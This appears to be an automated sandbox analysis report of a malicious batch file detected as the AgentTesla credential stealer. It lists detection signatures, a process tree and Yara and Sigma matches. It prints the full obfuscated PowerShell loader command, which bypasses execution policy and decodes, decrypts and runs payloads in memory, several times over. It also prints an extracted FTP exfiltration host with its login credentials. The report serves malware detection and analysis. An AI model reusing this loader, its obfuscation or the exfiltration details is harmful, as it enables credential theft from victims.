Edit tour

Windows Analysis Report
order no_3_17_2025 ref_HR 6473876476374647464657464564764746.bat

Overview

General Information

Sample name:	order no_3_17_2025 ref_HR 6473876476374647464657464564764746.bat
Analysis ID:	1640973
MD5:	fd5fbe534669e2b0fd7b50bd8acf1342
SHA1:	dc7428fcb7f9b33a7e49b5a96cc743983951a071
SHA256:	f6b6e3664095437f4984389106b6609575fbd411c38f71f696e148ec7df15c14
Tags:	batuser-smica83
Infos:

Detection

AgentTesla, Batch Injector

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected Batch Injector

Yara detected Powershell decode and execute

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

Bypasses PowerShell execution policy

Found suspicious powershell code related to unpacking or dynamic code loading

Joe Sandbox ML detected suspicious sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: PowerShell Base64 Encoded Invoke Keyword

Sigma detected: Suspicious PowerShell Parameter Substring

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Change PowerShell Policies to an Insecure Level

Uses FTP

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

cmd.exe (PID: 8536 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\order no_3_17_2025 ref_HR 6473876476374647464657464564764746.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 8588 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\order no_3_17_2025 ref_HR 6473876476374647464657464564764746.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8644 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vyc2lla2xOYW1lIHNpZWtsPSAkZW5zaWVrbHY6VVNFc2lla2xSTkFNRXNpZWtsOyRxY2dzaWVrbGttID0gc2lla2wiQzpcVXNpZWtsc2Vyc1xzaWVrbCR1c2Vyc2lla2xOYW1lXHNpZWtsZHdtLmJzaWVrbGF0Ijtpc2lla2xmIChUZXNpZWtsc3QtUGFzaWVrbHRoICRxc2lla2xjZ2ttKXNpZWtsIHsgICBzaWVrbCBXcml0c2lla2xlLUhvc3NpZWtsdCAiQmFzaWVrbHRjaCBmc2lla2xpbGUgZnNpZWtsb3VuZDpzaWVrbCAkcWNnc2lla2xrbSIgLXNpZWtsRm9yZWdzaWVrbHJvdW5kc2lla2xDb2xvcnNpZWtsIEN5YW5zaWVrbDsgICAgc2lla2wkZmlsZXNpZWtsTGluZXNzaWVrbCA9IFtTc2lla2x5c3RlbXNpZWtsLklPLkZzaWVrbGlsZV06c2lla2w6UmVhZHNpZWtsQWxsTGlzaWVrbG5lcygkc2lla2xxY2drbXNpZWtsLCBbU3lzaWVrbHN0ZW0uc2lla2xUZXh0LnNpZWtsRW5jb2RzaWVrbGluZ106c2lla2w6VVRGOHNpZWtsKTsgICBzaWVrbCBmb3Jlc2lla2xhY2ggKHNpZWtsJGxpbmVzaWVrbCBpbiAkc2lla2xmaWxlTHNpZWtsaW5lcylzaWVrbCB7ICAgc2lla2wgICAgIHNpZWtsaWYgKCRzaWVrbGxpbmUgc2lla2wtbWF0Y3NpZWtsaCAnXjpzaWVrbDo6ID8oc2lla2wuKykkJ3NpZWtsKSB7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsV3JpdGVzaWVrbC1Ib3N0c2lla2wgIkluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlIGRldHNpZWtsZWN0ZWRzaWVrbCBpbiB0c2lla2xoZSBiYXNpZWtsdGNoIGZzaWVrbGlsZS4ic2lla2wgLUZvcnNpZWtsZWdyb3VzaWVrbG5kQ29sc2lla2xvciBDeXNpZWtsYW47ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsdHJ5IHtzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAkZGVjc2lla2xvZGVkQnNpZWtseXRlcyBzaWVrbD0gW1N5c2lla2xzdGVtLnNpZWtsQ29udmVzaWVrbHJ0XTo6c2lla2xGcm9tQnNpZWtsYXNlNjRzaWVrbFN0cmluc2lla2xnKCRtYXNpZWtsdGNoZXNzaWVrbFsxXS5Uc2lla2xyaW0oKXNpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgJGlzaWVrbG5qZWN0c2lla2xpb25Db3NpZWtsZGUgPSBzaWVrbFtTeXN0c2lla2xlbS5UZXNpZWtseHQuRW5zaWVrbGNvZGluc2lla2xnXTo6VXNpZWtsbmljb2RzaWVrbGUuR2V0c2lla2xTdHJpbnNpZWtsZygkZGVzaWVrbGNvZGVkc2lla2xCeXRlc3NpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgV3JzaWVrbGl0ZS1Ic2lla2xvc3QgInNpZWtsSW5qZWNzaWVrbHRpb24gc2lla2xjb2RlIHNpZWtsZGVjb2RzaWVrbGVkIHN1c2lla2xjY2Vzc3NpZWtsZnVsbHlzaWVrbC4iIC1Gc2lla2xvcmVncnNpZWtsb3VuZENzaWVrbG9sb3Igc2lla2xHcmVlbnNpZWtsOyAgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICBXcmlzaWVrbHRlLUhvc2lla2xzdCAiRXNpZWtseGVjdXRzaWVrbGluZyBpc2lla2xuamVjdHNpZWtsaW9uIGNzaWVrbG9kZS4uc2lla2wuIiAtRnNpZWtsb3JlZ3JzaWVrbG91bmRDc2lla2xvbG9yIHNpZWtsWWVsbG9zaWVrbHc7ICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgIEluc2lla2x2b2tlLXNpZWtsRXhwcmVzaWVrbHNzaW9uc2lla2wgJGluanNpZWtsZWN0aW9zaWVrbG5Db2Rlc2lla2w7ICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2wgIGJyZXNpZWtsYWs7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsfSBjYXRzaWVrbGNoIHsgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2xXcml0ZXNpZWtsLUhvc3RzaWVrbCAiRXJyc2lla2xvciBkdXNpZWtscmluZyBzaWVrbGRlY29kc2lla2xpbmcgb3NpZWtsciBleGVzaWVrbGN1dGluc2lla2xnIGluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlOiAkX3NpZWtsIiAtRm9zaWVrbHJlZ3Jvc2lla2x1bmRDb3NpZWtsbG9yIFJzaWVrbGVkOyAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbH07ICAgc2lla2wgICAgIHNpZWtsfTsgICBzaWVrbCB9O30gc2lla2xlbHNlIHNpZWtseyAgICBzaWVrbCAgV3Jpc2lla2x0ZS1Ib3NpZWtsc3QgIlNzaWVrbHlzdGVtc2lla2wgRXJyb3NpZWtscjogQmFzaWVrbHRjaCBmc2lla2xpbGUgbnNpZWtsb3QgZm9zaWVrbHVuZDogc2lla2wkcWNna3NpZWtsbSIgLUZzaWVrbG9yZWdyc2lla2xvdW5kQ3NpZWtsb2xvciBzaWVrbFJlZDsgc2lla2wgICBleHNpZWtsaXQ7fTtzaWVrbGZ1bmN0c2lla2xpb24ganNpZWtseXZ0ZyhzaWVrbCRwYXJhc2lla2xtX3ZhcnNpZWtsKXsJJGFzaWVrbGVzX3Zhc2lla2xyPVtTeXNpZWtsc3RlbS5zaWVrbFNlY3Vyc2lla2xpdHkuQ3NpZWtscnlwdG9zaWVrbGdyYXBoc2lla2x5LkFlc3NpZWtsXTo6Q3JzaWVrbGVhdGUoc2lla2wpOwkkYXNpZWtsZXNfdmFzaWVrbHIuTW9kc2lla2xlPVtTeXNpZWtsc3RlbS5zaWVrbFNlY3Vyc2lla2xpdHkuQ3NpZWtscnlwdG9zaWVrbGdyYXBoc2lla2x5LkNpcHNpZWtsaGVyTW9zaWVrbGRlXTo6c2lla2xDQkM7CXNpZWtsJGFlc19zaWVrbHZhci5Qc2lla2xhZGRpbnNpZWtsZz1bU3lzaWVrbHN0ZW0uc2lla2xTZWN1cnNpZWtsaXR5LkNzaWVrbHJ5cHRvc2lla2xncmFwaHNpZWtseS5QYWRzaWVrbGRpbmdNc2lla2xvZGVdOnNpZWtsOlBLQ1NzaWVrbDc7CSRhc2lla2xlc192YXNpZWtsci5LZXlzaWVrbD1bU3lzc2lla2x0ZW0uQ3NpZWtsb252ZXJzaWVrbHRdOjpGc2lla2xyb21CYXNpZWtsc2U2NFNzaWVrbHRyaW5nc2lla2woJ21CbHNpZWtsMnVQUGJzaWVrbHgzcjRBc2lla2w2RTAxM3NpZWtsSXEvK1FzaWVrbDVnOGVVc2lla2xHbEMvcnNpZWtsSisweTNzaWVrbEZpa2p3c2lla2w9Jyk7CXNpZWtsJGFlc19zaWVrbHZhci5Jc2lla2xWPVtTeXNpZWtsc3RlbS5zaWVrbENvbnZlc2lla2xydF06OnNpZWtsRnJvbUJzaWVrbGFzZTY0c2lla2xTdHJpbnNpZWtsZygnYVNzaWVrbDR4a2dYc2lla2xQK01tNXNpZWtsMXQrVWJzaWVrbGI1aXl3c2lla2w9PScpO3NpZWtsCSRkZWNzaWVrbHJ5cHRvc2lla2xyX3ZhcnNpZWtsPSRhZXNzaWVrbF92YXIuc2lla2xDcmVhdHNpZWtsZURlY3JzaWVrbHlwdG9yc2lla2woKTsJJHNpZWtscmV0dXJzaWVrbG5fdmFyc2lla2w9JGRlY3NpZWtscnlwdG9zaWVrbHJfdmFyc2lla2wuVHJhbnNpZWtsc2Zvcm1zaWVrbEZpbmFsc2lla2xCbG9ja3NpZWtsKCRwYXJzaWVrbGFtX3Zhc2lla2xyLCAwLHNpZWtsICRwYXJzaWVrbGFtX3Zhc2lla2xyLkxlbnNpZWtsZ3RoKTtzaWVrbAkkZGVjc2lla2xyeXB0b3NpZWtscl92YXJzaWVrbC5EaXNwc2lla2xvc2UoKXNpZWtsOwkkYWVzaWVrbHNfdmFyc2lla2wuRGlzcHNpZWtsb3NlKClzaWVrbDsJJHJlc2lla2x0dXJuX3NpZWtsdmFyO31zaWVrbGZ1bmN0c2lla2xpb24gdXNpZWtseHdicihzaWVrbCRwYXJhc2lla2xtX3ZhcnNpZWtsKXsJJGlzaWVrbGRpdHI9c2lla2xOZXctT3NpZWtsYmplY3RzaWVrbCBTeXN0c2lla2xlbS5JT3NpZWtsLk1lbW9zaWVrbHJ5U3Ryc2lla2xlYW0oLHNpZWtsJHBhcmFzaWVrbG1fdmFyc2lla2wpOwkkd3NpZWtsY3BlbT1zaWVrbE5ldy1Pc2lla2xiamVjdHNpZWtsIFN5c3RzaWVrbGVtLklPc2lla2wuTWVtb3NpZWtscnlTdHJzaWVrbGVhbTsJc2lla2wkaW1wbXNpZWtseD1OZXdzaWVrbC1PYmplc2lla2xjdCBTeXNpZWtsc3RlbS5zaWVrbElPLkNvc2lla2xtcHJlc3NpZWtsc2lvbi5zaWVrbEdaaXBTc2lla2x0cmVhbXNpZWtsKCRpZGlzaWVrbHRyLCBbc2lla2xJTy5Db3NpZWtsbXByZXNzaWVrbHNpb24uc2lla2xDb21wcnNpZWtsZXNzaW9zaWVrbG5Nb2Rlc2lla2xdOjpEZXNpZWtsY29tcHJzaWVrbGVzcyk7c2lla2wJJGltcHNpZWtsbXguQ29zaWVrbHB5VG8oc2lla2wkd2NwZXNpZWtsbSk7CSRzaWVrbGltcG14c2lla2wuRGlzcHNpZWtsb3NlKClzaWVrbDsJJGlkc2lla2xpdHIuRHNpZWtsaXNwb3NzaWVrbGUoKTsJc2lla2wkd2NwZXNpZWtsbS5EaXNzaWVrbHBvc2Uoc2lla2wpOwkkd3NpZWtsY3BlbS5zaWVrbFRvQXJyc2lla2xheSgpO3NpZWtsfWZ1bmNzaWVrbHRpb24gc2lla2xjb2podHNpZWtsKCRwYXJzaWVrbGFtX3Zhc2lla2xyLCRwYXNpZWtscmFtMl9zaWVrbHZhcil7c2lla2wJJGJtcXNpZWtsaXg9W1NzaWVrbHlzdGVtc2lla2wuUmVmbHNpZWtsZWN0aW9zaWVrbG4uQXNzc2lla2xlbWJseXNpZWtsXTo6KCdzaWVrbGRhb0wnc2lla2xbLTEuLnNpZWtsLTRdIC1zaWVrbGpvaW4gc2lla2wnJykoW3NpZWtsYnl0ZVtzaWVrbF1dJHBhc2lla2xyYW1fdnNpZWtsYXIpOwlzaWVrbCRhc2F3c2lla2xmPSRibXNpZWtscWl4LkVzaWVrbG50cnlQc2lla2xvaW50O3NpZWtsCSRhc2FzaWVrbHdmLkluc2lla2x2b2tlKHNpZWtsJG51bGxzaWVrbCwgJHBhc2lla2xyYW0yX3NpZWtsdmFyKTtzaWVrbH0kaG9zc2lla2x0LlVJLnNpZWtsUmF3VUlzaWVrbC5XaW5kc2lla2xvd1RpdHNpZWtsbGUgPSBzaWVrbCRxY2drc2lla2xtOyR6anNpZWtsaGtiPVtzaWVrbFN5c3Rlc2lla2xtLklPLnNpZWtsRmlsZV1zaWVrbDo6KCd0c2lla2x4ZVRsbHNpZWtsQWRhZVJzaWVrbCdbLTEuc2lla2wuLTExXXNpZWtsIC1qb2lzaWVrbG4gJycpc2lla2woJHFjZ3NpZWtsa20pLlNzaWVrbHBsaXQoc2lla2xbRW52aXNpZWtscm9ubWVzaWVrbG50XTo6c2lla2xOZXdMaXNpZWtsbmUpO2ZzaWVrbG9yZWFjc2lla2xoICgkeXNpZWtscG90YSBzaWVrbGluICR6c2lla2xqaGtiKXNpZWtsIHsJaWZzaWVrbCAoJHlwc2lla2xvdGEuU3NpZWtsdGFydHNzaWVrbFdpdGgoc2lla2wnOjogJ3NpZWtsKSkJewlzaWVrbAkkcmxvc2lla2x3cD0keXNpZWtscG90YS5zaWVrbFN1YnN0c2lla2xyaW5nKHNpZWtsMyk7CQlzaWVrbGJyZWFrc2lla2w7CX19JHNpZWtscG95am5zaWVrbD1bc3Ryc2lla2xpbmdbXXNpZWtsXSRybG9zaWVrbHdwLlNwc2lla2xsaXQoJ3NpZWtsXCcpOyRzaWVrbGNqeXlrc2lla2w9dXh3YnNpZWtsciAoanlzaWVrbHZ0ZyAoc2lla2xbQ29udnNpZWtsZXJ0XTpzaWVrbDpGcm9tc2lla2xCYXNlNnNpZWtsNFN0cmlzaWVrbG5nKCRwc2lla2xveWpuW3NpZWtsMF0pKSlzaWVrbDskcnhjc2lla2x4bD11eHNpZWtsd2JyIChzaWVrbGp5dnRnc2lla2wgKFtDb3NpZWtsbnZlcnRzaWVrbF06OkZyc2lla2xvbUJhc3NpZWtsZTY0U3RzaWVrbHJpbmcoc2lla2wkcG95anNpZWtsblsxXSlzaWVrbCkpO2Nvc2lla2xqaHQgJHNpZWtsY2p5eWtzaWVrbCAkbnVsc2lla2xsO2NvanNpZWtsaHQgJHJzaWVrbHhjeGwgc2lla2woLFtzdHNpZWtscmluZ1tzaWVrbF1dICgnc2lla2wlKicpKXNpZWtsOw0KJ0ANCg0KJGRlb2JmdXNjYXRlZCA9ICRzY3JpcHRDb250ZW50IC1yZXBsYWNlICdzaWVrbCcsICcnDQoNCkludm9rZS1FeHByZXNzaW9uICRkZW9iZnVzY2F0ZWQNCg==')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.hitplas.ro", "Username": "hit@hitplas.ro", "Password": "@hitplas.ro"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.3788613694.0000000005EB2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000004.00000002.3788613694.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000004.00000002.3794927751.0000000008DD5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.3794622597.00000000082E0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000004.00000002.3794927751.0000000008E2B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
Process Memory Space: powershell.exe PID: 8644	JoeSecurity_BatchInjector	Yara detected Batch Injector	Joe Security
Process Memory Space: powershell.exe PID: 8644	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: powershell.exe PID: 8644	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: powershell.exe PID: 8644	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x41cff:$b2: ::FromBase64String( 0x42067:$b2: ::FromBase64String( 0x6bc40:$b2: ::FromBase64String( 0x6d8e4:$b2: ::FromBase64String( 0x86ad6:$b2: ::FromBase64String( 0x8877a:$b2: ::FromBase64String( 0x8e173:$b2: ::FromBase64String( 0x8fe18:$b2: ::FromBase64String( 0xaff31:$b2: ::FromBase64String( 0xb0296:$b2: ::FromBase64String( 0xb02f6:$b2: ::FromBase64String( 0xb0707:$b2: ::FromBase64String( 0xb0745:$b2: ::FromBase64String( 0x1c5f1b:$b2: ::FromBase64String( 0x1d5339:$b2: ::FromBase64String( 0x1e5978:$b2: ::FromBase64String( 0x1e7611:$b2: ::FromBase64String( 0x24278a:$b2: ::FromBase64String( 0x244423:$b2: ::FromBase64String( 0x248e88:$b2: ::FromBase64String( 0x24ab21:$b2: ::FromBase64String(
decrypted.memstr	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author
4.2.powershell.exe.5e62e10.1.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
4.2.powershell.exe.5eb2e30.5.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
4.2.powershell.exe.82e0000.8.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
4.2.powershell.exe.82e0000.8.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
4.2.powershell.exe.5e3adf0.4.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
4.2.powershell.exe.5e62e10.1.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
4.2.powershell.exe.5e3adf0.4.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
4.2.powershell.exe.5eb2e30.5.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
Click to see the 3 entries

Other

Source	Rule	Description	Author	Strings
amsi32_8644.amsi.csv	JoeSecurity_BatchInjector	Yara detected Batch Injector	Joe Security
amsi32_8644.amsi.csv	JoeSecurity_PowershellDecodeAndExecute	Yara detected Powershell decode and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vyc2lla2xOYW1lIHNpZWtsPSAkZW5zaWVrbHY6VVNFc2lla2xSTkFNRXNpZWtsOyRxY2dzaWVrbGttID0gc2lla2wiQzpcVXNpZWtsc2Vyc1xzaWVrbCR1c2Vyc2lla2xOYW1lXHNpZWtsZHdtLmJzaWVrbGF0Ijtpc2lla2xmIChUZXNpZWtsc3QtUGFzaWVrbHRoICRxc2lla2xjZ2ttKXNpZWtsIHsgICBzaWVrbCBXcml0c2lla2xlLUhvc3NpZWtsdCAiQmFzaWVrbHRjaCBmc2lla2xpbGUgZnNpZWtsb3VuZDpzaWVrbCAkcWNnc2lla2xrbSIgLXNpZWtsRm9yZWdzaWVrbHJvdW5kc2lla2xDb2xvcnNpZWtsIEN5YW5zaWVrbDsgICAgc2lla2wkZmlsZXNpZWtsTGluZXNzaWVrbCA9IFtTc2lla2x5c3RlbXNpZWtsLklPLkZzaWVrbGlsZV06c2lla2w6UmVhZHNpZWtsQWxsTGlzaWVrbG5lcygkc2lla2xxY2drbXNpZWtsLCBbU3lzaWVrbHN0ZW0uc2lla2xUZXh0LnNpZWtsRW5jb2RzaWVrbGluZ106c2lla2w6VVRGOHNpZWtsKTsgICBzaWVrbCBmb3Jlc2lla2xhY2ggKHNpZWtsJGxpbmVzaWVrbCBpbiAkc2lla2xmaWxlTHNpZWtsaW5lcylzaWVrbCB7ICAgc2lla2wgICAgIHNpZWtsaWYgKCRzaWVrbGxpbmUgc2lla2wtbWF0Y3NpZWtsaCAnXjpzaWVrbDo6ID8oc2lla2wuKykkJ3NpZWtsKSB7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsV3JpdGVzaWVrbC1Ib3N0c2lla2wgIkluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlIGRldHNpZWtsZWN0ZWRzaWVrbCBpbiB0c2lla2xoZSBiYXNpZWtsdGNoIGZzaWVrbGlsZS4ic2lla2wgLUZvcnNpZWtsZWdyb3VzaWVrbG5kQ29sc2lla2xvciBDeXNpZWtsYW47ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsdHJ5IHtzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAkZGVjc2lla2xvZGVkQnNpZWtseXRlcyBzaWVrbD0gW1N5c2lla2xzdGVtLnNpZWtsQ29udmVzaWVrbHJ0XTo6c2lla2xGcm9tQnNpZWtsYXNlNjRzaWVrbFN0cmluc2lla2xnKCRtYXNpZWtsdGNoZXNzaWVrbFsxXS5Uc2lla2xyaW0oKXNpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgJGlzaWVrbG5qZWN0c2lla2xpb25Db3NpZWtsZGUgPSBzaWVrbFtTeXN0c2lla2xlbS5UZXNpZWtseHQuRW5zaWVrbGNvZGluc2lla2xnXTo6VXNpZWtsbmljb2RzaWVrbGUuR2V0c2lla2xTdHJpbnNpZWtsZygkZGVzaWVrbGNvZGVkc2lla2xCeXRlc3NpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgV3JzaWVrbGl0ZS1Ic2lla2xvc3QgInNpZWtsSW5qZWNzaWVrbHRpb24gc2lla2xjb2RlIHNpZWtsZGVjb2RzaWVrbGVkIHN1c2lla2xjY2Vzc3NpZWtsZnVsbHlzaWVrbC4iIC1Gc2lla2xvcmVncnNpZWtsb3VuZENzaWVrbG9sb3Igc2lla2xHcmVlbnNpZWtsOyAgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICBXcmlzaWVrbHRlLUhvc2lla2xzdCAiRXNpZWtseGVjdXRzaWVrbGluZyBpc2lla2xuamVjdHNpZWtsaW9uIGNzaWVrbG9kZS4uc2lla2wuIiAtRnNpZWtsb3JlZ3JzaWVrbG91bmRDc2lla2xvbG9yIHNpZWtsWWVsbG9zaWVrbHc7ICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgIEluc2lla2x2b2tlLXNpZWtsRXhwcmVzaWVrbHNzaW9uc2lla2wgJGluanNpZWtsZWN0aW9zaWVrbG5Db2Rlc2lla2w7ICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2wgIGJyZXNpZWtsYWs7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsfSBjYXRzaWVrbGNoIHsgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2xXcml0ZXNpZWtsLUhvc3RzaWVrbCAiRXJyc2lla2xvciBkdXNpZWtscmluZyBzaWVrbGRlY29kc2lla2xpbmcgb3NpZWtsciBleGVzaWVrbGN1dGluc2lla2xnIGluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlOiAkX3NpZWtsIiAtRm9zaWVrbHJlZ3Jvc2lla2x1bmRDb3NpZWtsbG9yIFJzaWVrbGVkOyAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbH07ICAgc2lla2wgICAgIHNpZWtsfTsgICBzaWVrbCB9O30gc2lla2xlbHNlIHNpZWtseyAgICBzaWVrbCAgV3Jpc2lla2x0ZS1Ib3NpZWtsc3QgIlNzaWVrbHlzdGVtc2lla2wgRXJyb3NpZWtscjogQmFzaWVrbHRjaCBmc2lla2xpbGUgbnNpZWtsb3QgZm9zaWVr

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: PowerShell Base64 Encoded Invoke Keyword

Source: Process started

Author: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vyc2lla2xOYW1lIHNpZWtsPSAkZW5zaWVrbHY6VVNFc2lla2xSTkFNRXNpZWtsOyRxY2dzaWVrbGttID0gc2lla2wiQzpcVXNpZWtsc2Vyc1xzaWVrbCR1c2Vyc2lla2xOYW1lXHNpZWtsZHdtLmJzaWVrbGF0Ijtpc2lla2xmIChUZXNpZWtsc3QtUGFzaWVrbHRoICRxc2lla2xjZ2ttKXNpZWtsIHsgICBzaWVrbCBXcml0c2lla2xlLUhvc3NpZWtsdCAiQmFzaWVrbHRjaCBmc2lla2xpbGUgZnNpZWtsb3VuZDpzaWVrbCAkcWNnc2lla2xrbSIgLXNpZWtsRm9yZWdzaWVrbHJvdW5kc2lla2xDb2xvcnNpZWtsIEN5YW5zaWVrbDsgICAgc2lla2wkZmlsZXNpZWtsTGluZXNzaWVrbCA9IFtTc2lla2x5c3RlbXNpZWtsLklPLkZzaWVrbGlsZV06c2lla2w6UmVhZHNpZWtsQWxsTGlzaWVrbG5lcygkc2lla2xxY2drbXNpZWtsLCBbU3lzaWVrbHN0ZW0uc2lla2xUZXh0LnNpZWtsRW5jb2RzaWVrbGluZ106c2lla2w6VVRGOHNpZWtsKTsgICBzaWVrbCBmb3Jlc2lla2xhY2ggKHNpZWtsJGxpbmVzaWVrbCBpbiAkc2lla2xmaWxlTHNpZWtsaW5lcylzaWVrbCB7ICAgc2lla2wgICAgIHNpZWtsaWYgKCRzaWVrbGxpbmUgc2lla2wtbWF0Y3NpZWtsaCAnXjpzaWVrbDo6ID8oc2lla2wuKykkJ3NpZWtsKSB7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsV3JpdGVzaWVrbC1Ib3N0c2lla2wgIkluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlIGRldHNpZWtsZWN0ZWRzaWVrbCBpbiB0c2lla2xoZSBiYXNpZWtsdGNoIGZzaWVrbGlsZS4ic2lla2wgLUZvcnNpZWtsZWdyb3VzaWVrbG5kQ29sc2lla2xvciBDeXNpZWtsYW47ICBzaWVrb